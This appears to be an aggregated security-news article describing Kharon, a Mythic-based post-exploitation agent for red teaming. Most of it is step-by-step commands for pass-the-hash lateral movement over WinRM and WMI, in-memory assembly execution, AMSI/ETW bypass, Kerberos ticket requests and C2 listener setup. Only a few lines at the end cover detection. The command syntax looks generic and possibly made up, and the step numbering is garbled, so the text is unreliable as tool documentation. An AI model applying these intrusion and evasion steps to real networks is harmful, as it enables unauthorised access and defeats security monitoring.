Listen to this Post

Introduction
The Kharon Agent, developed by security researcher Josué M., is a cutting-edge Mythic-based post-exploitation tool designed for advanced red teaming and penetration testing. With features like lateral movement, in-memory execution, and evasion techniques, it provides cybersecurity professionals with powerful capabilities to simulate real-world attacks. This article explores its key functionalities and provides actionable commands for testing and defense.
Learning Objectives
- Understand Kharon Agent’s post-exploitation capabilities
- Learn how to execute lateral movement techniques like WinRM and WMI
- Explore evasion methods such as hardware breakpoints for bypassing AMSI/ETW
1. Lateral Movement with WinRM (Without PowerShell)
Command:
kharon lateral --technique winrm --target 192.168.1.100 --username admin --hash <NTLM_HASH>
Step-by-Step Guide:
- Replace `192.168.1.100` with the target IP and `
` with the captured hash. - The agent uses native WinRM APIs (no PowerShell) for stealthier movement.
3. Verify execution via the Mythic C2 console.
2. In-Memory Execution of .NET Assemblies
Command:
kharon execute --assembly /path/to/SharpHound.exe --args "--CollectionMethod All"
Step-by-Step Guide:
- Loads .NET assemblies directly into memory, avoiding disk writes.
- Supports Beacon Object Files (BOFs) for C2 integration.
3. Monitor execution logs in Mythic for output.
3. Bypassing AMSI/ETW with Hardware Breakpoints
Command:
kharon evade --technique hwbp --process explorer.exe
Step-by-Step Guide:
- Targets a process (e.g.,
explorer.exe) to patch AMSI/ETW in memory. - Uses hardware breakpoints to avoid API hook detection.
3. Validate bypass with `amsi.dll` memory inspection.
4. Kerberos Ticket Manipulation (Rubeus-like)
Command:
kharon kerberos --action asktgt --user victim --password P@ssw0rd --domain corp.local
Step-by-Step Guide:
1. Requests a TGT for the specified user/domain.
2. Supports `/ptt` (Pass-the-Ticket) and `/dump` functions.
3. Export tickets for offline analysis with Mimikatz.
5. Unmanaged PowerShell Execution
Command:
kharon powershell --script /path/to/script.ps1 --no-amsi
Step-by-Step Guide:
1. Executes PowerShell scripts without loading `System.Management.Automation.dll`.
- Bypasses script logging and AMSI via direct CLR invocation.
3. Use `–no-amsi` to disable AMSI scans.
6. SMB/HTTP Listener Configuration
Command:
kharon listener --protocol smb --port 445 --name smb_c2
Step-by-Step Guide:
- Sets up an SMB listener for C2 communication.
2. HTTP/S listeners support SSL encryption (`–cert /path/to/cert.pem`).
3. Test connectivity with `net use \\192.168.1.100\share`.
7. Exploiting WMI for Lateral Movement
Command:
kharon lateral --technique wmi --target 192.168.1.101 --username admin --password P@ssw0rd
Step-by-Step Guide:
1. Authenticates via WMI to execute commands remotely.
- Avoids `svchost.exe` spawning with direct COM API calls.
3. Mitigation: Restrict WMI permissions via GPO.
What Undercode Say:
- Key Takeaway 1: Kharon Agent’s hardware breakpoint evasion is a game-changer for bypassing EDR.
- Key Takeaway 2: Unmanaged PowerShell execution reduces detection risks significantly.
Analysis:
Kharon’s integration of advanced techniques (e.g., Kerberos manipulation, WinRM without PowerShell) positions it as a formidable post-exploitation tool. Defenders should monitor for unusual WMI/SMB traffic and enforce AMSI/ETW hardening. Future updates may include kernel-mode rootkits, raising the bar for detection.
Prediction:
As offensive tools like Kharon evolve, enterprises must adopt memory scanning, restricted admin access, and behavioral analytics to counter in-memory attacks. The line between red teaming and APT tooling will continue to blur.
References:
IT/Security Reporter URL:
Reported By: Josu%C3%A9 M – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


